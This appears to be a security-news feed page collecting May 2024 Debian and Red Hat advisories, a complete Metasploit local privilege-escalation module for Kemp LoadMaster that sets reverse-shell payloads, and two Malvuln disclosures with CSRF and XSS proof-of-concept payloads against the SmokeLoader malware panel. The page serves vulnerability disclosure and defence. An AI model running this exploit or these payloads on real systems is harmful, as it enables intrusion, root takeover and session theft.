Debian Linux Security Advisory 5688-1 - It was discovered that missing input sanitising in the Atril document viewer could result in writing arbitrary files in the users home directory if a malformed epub document is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5688-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 12, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : atrilCVE ID         : CVE-2023-52076It was discovered that missing input sanitising in the Atril documentviewer could result in writing arbitrary files in the users home directoryif a malformed epub document is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.24.0-1+deb11u1. This update also disables support forcomic book archives, mitigating CVE-2023-51698.For the stable distribution (bookworm), this problem has been fixed inversion 1.26.0-2+deb12u3.We recommend that you upgrade your atril packages.For the detailed security status of atril please refer toits security tracker page at:https://security-tracker.debian.org/tracker/atrilFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZAwWEACgkQEMKTtsN8TjYqAw/+OF7wq08UNm4f0fbj/1xH8rFftCj/pnB1XGjkPiOPQA7cYDHUM0kRjEQt4MDCxzQXs5gWOR20XhZUUij95xj2d29t99N9xRWdhoC49pWOfAUKRNojrt+aa/LXSzEd2tQTWD+RuFd0ODUVJ8EYwwTH+U+NA2qVRnrXVS2PT3rUIotdXjIUPPe+LII+UX/wx3c8AKBk8UH+2bJJnLpZ26KqzcoQR4Qx4hClx0mvDFtmbKPANBeiiJSmy3erY9VG7PSDqI0m+N67Sa5mOqOr9rVFNpqXJegSm/RIEvN/K3J+HKtxpkDyWIsG8troZxA53WanVGLjWVU9HnE+XtwMvEQcjlg2r/vaN/oisbdFzybbBFrvoITVBQTeKnMPGVI3IIPGRBlHYGFJpvhc25xZfVphYlqB9gVwDIlkIIPCa23fr4KilCK/k7fDTrF/3ae91LnzyLMIxBIIDmtEbdWxKxCnizZtTpZf0Tdy1srueqdW5FdqT0fl/SZqtWhJ2g/uAROk4lOvs8H609it8UCK4X9PPZwYci7gzKHBpzQ5vuI+oAjL9EN41R4sahq6Wl0Z7n5gFcsfpfKSkdFosLMylsfQ3h2Wfdw/obiXr9VYjIUQHBdQ6zUgOnwdhNp8hvwY2WNDWrpwg2mu0cp8zRcCFLeHtfYcza9VWtiJcEa+6WAAemQ==6TWQ-----END PGP SIGNATURE-----

Debian Security Advisory 5688-1

Debian Linux Security Advisory 5687-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure. Google is aware that an exploit for CVE-2024-4671 exists in the wild.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5687-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMay 10, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-4671A security issue was discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure. Google is aware that an exploit for CVE-2024-4671 existsin the wild.For the stable distribution (bookworm), this problem has been fixed inversion 124.0.6367.201-1~deb12u1.We highly recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmY+V2EACgkQZF0CR8Nudjc6KxAAmbOIpJDKJntYp1sgQdqm6PKSMYSnUWlcZXSAyJkhGPlkGiMyttmLD5X2CO3wk8R7bkV0SDZZPhN58+KKe6m0QjyI8QuXav47aQd+YePRkqweUDJYCMf9Wf3S3zte5tIloXwofTv0uW0ZXJ9WU0ADu9Q9PATK1121RVqD0a2js3H1z6nMTbOPn2S8QF/Khm9IdfihweaJA2MJYncsxTSZgFbVUIiVq2Zu3d1OfkJbtx/wgcZFo2+O9dcKsuR6p/PrhjujwUIw9cxyiTuU8D4FFEk86Lr52akM60dFJLiF6XPvGHdfb2BZ3ev2QTvRzA9msMNAWf+GlV3hed9S3+F866mOK0LRXBNlJvGtJFJRzFs0q5VrDM5hSEEa0c6tm8gw8id+NHcS8iXr/CHDP9w8nu0iJxtupA3jRTsNyLPu5kXRyATPMVjZtssVDz/TQSpnxFNaMWdCu9TxPs4/3kPEEu0HW8PbVV0rWaF5PvnT5JU/rEp6ho9Omx/fKzJPfjO4t/GxgZ7gcTm7QrRKI4W3VhNSn1kTvA15mndKm0YMNZfvD7tURytU7Qm0EGTzpNc4MScGKASZ8XRuygQnj9oCHegyu1el5BmCu/mbOLDr4neh1hDq3YDHIlkfTnv/txolKV9hFrQPdf/Wn/CA2f9Zw3HMWECCbYkVTvxak/+Nj0g==/LcI-----END PGP SIGNATURE-----

Debian Security Advisory 5687-1

This Metasploit module abuses a feature of the sudo command on Progress Kemp LoadMaster. Certain binary files are allowed to automatically elevate with the sudo command. This is based off of the file name. Some files have this permission are not write-protected from the default bal user. As such, if the file is overwritten with an arbitrary file, it will still auto-elevate. This module overwrites the /bin/loadkeys file with another executable.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Post::File  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kemp LoadMaster Local sudo privilege escalation',        'Description' => %q{          This module abuses a feature of the sudo command on Progress Kemp          LoadMaster.  Certain binary files are allowed to automatically elevate          with the sudo command.  This is based off of the file name.  Some files          have this permission are not write-protected from the default 'bal' user.          As such, if the file is overwritten with an arbitrary file, it will still          auto-elevate.  This module overwrites the /bin/loadkeys file with another          executable.        },        'Author' => [          'Dave Yesland with Rhino Security Labs',          'bwatters-r7' # module,        ],        'License' => MSF_LICENSE,        'References' => [          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']        ],        'DisclosureDate' => '2024-03-19',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'SessionTypes' => ['shell', 'meterpreter'],        'Platform' => ['unix', 'linux'],        'Targets' => [          [            'Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'              }            }          ],          [            'Command',            {              'Arch' => [ARCH_CMD],              'Type' => :command,              'Payload' =>                {                  'BadChars' => "\x27",                  'Compat' =>                    {                      'PayloadType' => 'cmd',                      'RequiredCmd' => 'generic gawk telnet ssh echo'                    }                },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse'              }            }          ]        ],        'Privileged' => true      )    )    register_options([      OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ])    ])  end  def check    score = 0    score += 1 if read_file('/usr/wui/index.js').include?('KEMP')    score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')    score += 1 if exists?('/usr/wui/eula.kemp.html')    vprint_status("Found #{score} indicators this is a KEMP product")    return CheckCode::Detected if score > 0    return CheckCode::Safe  end  def verify_copy(src, dest, elevate)    orig_file_hash = file_remote_digestmd5(src)    vprint_status("Moving #{src} to #{dest}")    if elevate      output = cmd_exec("sudo /bin/cp '#{src}' '#{dest}'")    else      output = cmd_exec("/bin/cp '#{src}' '#{dest}'")    end    return true if file_remote_digestmd5(dest) == orig_file_hash    print_bad("Copy failed - #{output}")    false  end  def execute_dropper(target_binary, binary_rename, temp_payload_path)    vprint_status("Writing payload to #{temp_payload_path}")    write_file(temp_payload_path, generate_payload_exe)    chmod(temp_payload_path)    register_file_for_cleanup(temp_payload_path)    return unless verify_copy(target_binary, binary_rename, false)    return unless verify_copy(temp_payload_path, target_binary, true)    vprint_status("Running #{target_binary}")    cmd_exec("sudo '#{target_binary}'")  end  def execute_command(target_binary, binary_rename, cmd)    vprint_status('Preparing payload command')    # save copy of target_binary    return unless verify_copy(target_binary, binary_rename, false)    return unless verify_copy('/bin/bash', target_binary, true)    vprint_status('Running payload command')    vprint_status(cmd_exec("sudo #{target_binary} -c '#{cmd}'"))  end  def exploit    writable_dir = datastore['WRITABLE_DIR']    if writable_dir.blank? || (writable_dir[-1] != '/')      writable_dir += '/'    end    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)    target_binary = datastore['TARGET_BINARY']    binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"    target_binary_hash = file_remote_digestmd5(target_binary)    begin      case target['Type']      when :dropper        temp_payload = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"        execute_dropper(target_binary, binary_rename, temp_payload)      when :command        execute_command(target_binary, binary_rename, payload.encoded)      end    ensure      unless target_binary_hash == file_remote_digestmd5(target_binary)        cmd_exec("sudo rm '#{target_binary}'")        verify_copy(binary_rename, target_binary, true)        cmd_exec("sudo rm '#{binary_rename}'")      end    end    if target_binary_hash == file_remote_digestmd5(target_binary)      print_good("#{target_binary} returned to original contents")    else      print_bad("#{target_binary} was not returned to original contents")    end  endend

Kemp LoadMaster Local sudo Privilege Escalation

Panel.SmokeLoader malware suffers from cross site request forgery, and cross site scripting vulnerabilities.

**Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting**

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Request Forgery (CSRF) - Persistent XSSFamily: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0682Disclosure: The smokebot admin web panel is written in PHP for remote administration capability.The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM using POST method, however there is no CSRF security token used by the FORM. This is a unique token per session within the FORM, used as a challenge to the server to help prevent cross-site-scripting attacks. Therefore, third-party adversaries who can lure a panel user to visit an attacker controlled webpage or click an infected link may result in the panel users submitting FORMS on an attackers behalf. This may result in code execution, data theft, GEO location disclosure. The CSRF to XSS results in stored JS payload in the smoke MySQL database table "plugins".hash   fgfilter   fakedns_rules   filesearch_rules   procmon_rules   ddos_rules   keylog_rules   fgcookies   miner_rules   93666df0833e0b63917e5373812613               0   ""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/l...Exploit/PoC:1) CSRF to add your own Miner Pool%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="30" value="MyPoolFool:666"%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3E2) CSRF to Persistent XSS%3Cform method="post" action="http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner"%3EPool: %3Cinput type="input" name="miner_pool" size="300" value='""/%3E%3Cscript%3Ewindow.open("https://www.malvuln.com/log.php")%3C/script%3E"'%3E Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3EPassword: %3Cinput type="input" name="miner_pass" size="20" value="malvuln"%3E%3Cinput type="hidden" name="mode" value="miner"%3E%3Cinput type="submit" value="SAVE"%3E%3Cscript%3Edocument.forms[0].submit()%3C/script%3E%3C/form%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0682 Cross Site Request Forgery / Cross Site Scripting

Panel.SmokeLoader malware suffers from a cross site scripting vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel.SmokeLoader Vulnerability: Cross Site Scripting (XSS)Family: SmokeLoader Type: Web Panel MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743Vuln ID: MVID-2024-0681Disclosure: 05/11/2024Description: The smokebot admin web panel is written in PHP for remote administration capability. The panel has multiple features like Bot List, Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP page contains an HTML FORM that uses $_SERVER["PHP_SELF"] for the form action method. This is a super global variable that returns the filename of the currently executing script. There is no secure coding practices of filtering input or sanitization of output e.g "htmlspecialchars()". Therefore, panel users who visit a third-party adversary website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the smokebot web interface.PHP snippet.if ($_GET["mode"] === "reports"){   $url_pattern = $_GET["logs_sru"];   $id_pattern = $_GET["logs_sri"];$action = $_SERVER["PHP_SELF"]."?page=stealer&mode=reports";%3Cform method=\"get\" action=\"{$action}\"%3EInterestingly, they use PHP function htmlspecialchars() when retrieving data from the "smoke bot" MySQL database.$r = mysqli_query($dbcon,"SELECT * FROM `stealer` WHERE `cname`='{$id}'");   while ($v = mysqli_fetch_assoc($r)){   $stealer_host = htmlspecialchars($v["host"]);However, it doesn't wrap $_SERVER["PHP_SELF"] on the action method for the FORM {$action} variable that handles user input.Exploit/PoC:1) http://x.x.x.x/SmokeLoader/control1.php?page=stealer&mode=reports&logs_sri=%22/%3E%3Cscript%3Ewindow.open("https://malvuln.com")%3C/script%3E&logs_sru=&next=12) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sri=%22/%3E%3Cscript%3Ealert((document.cookie)%3C/script%3E3) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_sru=%22/%3E%3Cscript%3Ewindow.open('https://hyp3rlinx.altervista.org/')%3C/script%3E4) http://x.x.x.x/SmokeLoader/control1.php?page=fgrab&mode=reports&forms_srd=%22/%3E%3Cscript%3Ealert(%22malvuln%22)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel.SmokeLoader MVID-2024-0681 Cross Site Scripting

Red Hat Security Advisory 2024-2822-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2822.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid:4 security updateAdvisory ID:        RHSA-2024:2822-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2822Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2024-25111====================================================================Summary: An update for the squid:4 module is now available for Red Hat Enterprise Linux8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supportingFTP, and HTTP data objects.Security Fix(es):* Denial of Service in HTTP Chunked Decoding (CVE-2024-25111)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25111References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268366

Red Hat Security Advisory 2024-2822-03

Red Hat Security Advisory 2024-2821-03 - An update for bind and dhcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2821.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: bind and dhcp security updateAdvisory ID:        RHSA-2024:2821-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2821Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2023-4408====================================================================Summary: An update for bind and dhcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.Security Fix(es):* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4408References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263896https://bugzilla.redhat.com/show_bug.cgi?id=2263914https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-2821-03

Red Hat Security Advisory 2024-2820-03 - An update for varnish is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2820.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish security updateAdvisory ID:        RHSA-2024:2820-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2820Issue date:         2024-05-13Revision:           03CVE Names:          CVE-2024-30156====================================================================Summary: An update for varnish is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-30156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271486

Red Hat Security Advisory 2024-2820-03

Red Hat Security Advisory 2024-2817-03 - An update is now available for Red Hat OpenShift GitOps v1.10.5 for Argo CD UI and Console Plugin. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2817.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Errata Advisory for Red Hat OpenShift GitOps v1.10.5 security update  
Advisory ID:        RHSA-2024:2817-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2817  
Issue date:         2024-05-10  
Revision:           03  
CVE Names:          CVE-2024-29180  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps v1.10.5 for Argo CD UI and Console Plugin. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Errata Advisory for Red Hat OpenShift GitOps v1.10.5.

Security Fix(es):

* argo-cd: webpack-dev-middleware: lack of URL validation may lead to file leak (CVE-2024-29180).

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

1. Fix for a critical bug reported by customers where IgnoreDifferences Option  
in Sync Options was not working for array fields in ArgoCD. This fix will allow the users to ignore specific fields in the array when specified in  
ignoreDifferences during Sync.

2. A fix that enables customer to add clusters hosted on GCP to ArgoCD.

3. An important customer fix that ensures that Argo CD correctly reports support for these host key algorithms during the handshake process, allowing the pull from Azure DevOps Repos to succeed.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-29180

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.10/release_notes/gitops-release-notes.html  
https://docs.openshift.com/gitops/1.10/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2270863  
https://issues.redhat.com/browse/GITOPS-4226  
https://issues.redhat.com/browse/GITOPS-4513  
https://issues.redhat.com/browse/GITOPS-4543  
https://issues.redhat.com/browse/GITOPS-4645

Red Hat Security Advisory 2024-2817-03

Red Hat Security Advisory 2024-2816-03 - An update is now available for Red Hat OpenShift GitOps v1.12.2 for Argo CD UI and Console Plugin. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2816.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Errata Advisory for Red Hat OpenShift GitOps v1.12.2 security update  
Advisory ID:        RHSA-2024:2816-03  
Product:            Red Hat OpenShift GitOps  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2816  
Issue date:         2024-05-10  
Revision:           03  
CVE Names:          CVE-2024-29180  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift GitOps v1.12.2 for Argo CD UI and Console Plugin. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Errata Advisory for Red Hat OpenShift GitOps v1.12.2.

Security Fix(es):

* argo-cd: webpack-dev-middleware: lack of URL validation may lead to file leak (CVE-2024-29180).

* argo-cd: API server does not enforce project sourceNamespaces (CVE-2024-31990).

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

1. Fix for a critical bug reported by customers where IgnoreDifferences Option in Sync Options was not working for array fields in ArgoCD. This fix will allow the users to ignore specific fields in the array when specified in ignoreDifferences during Sync.

2. Added support for rollouts in gitops-must-gather which will allow customers to gather data and logs about their rollout installation.

3. A fix that enables customer to add clusters hosted on GCP to ArgoCD.

4. A fix to allow users to configure Notification Context in NotificationsConfigurationCR.

5. Another fix to enable scheduling console-plugin workloads on Infra nodes.

6. A fix to resolve customer bug which will now allow the users to create ArgoCD from Developer Console.

7. An important customer fix that ensures that Argo CD correctly reports support for these host key algorithms during the handshake process, allowing the pull from Azure DevOps Repos to succeed.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-29180

References:

https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/gitops/1.12/release_notes/gitops-release-notes.html  
https://docs.openshift.com/gitops/1.12/understanding_openshift_gitops/about-redhat-openshift-gitops.html  
https://bugzilla.redhat.com/show_bug.cgi?id=2270863  
https://bugzilla.redhat.com/show_bug.cgi?id=2275189  
https://issues.redhat.com/browse/GITOPS-3736  
https://issues.redhat.com/browse/GITOPS-3947  
https://issues.redhat.com/browse/GITOPS-4226  
https://issues.redhat.com/browse/GITOPS-4303  
https://issues.redhat.com/browse/GITOPS-4358  
https://issues.redhat.com/browse/GITOPS-4496  
https://issues.redhat.com/browse/GITOPS-4513  
https://issues.redhat.com/browse/GITOPS-4543  
https://issues.redhat.com/browse/GITOPS-4645

Tag

#js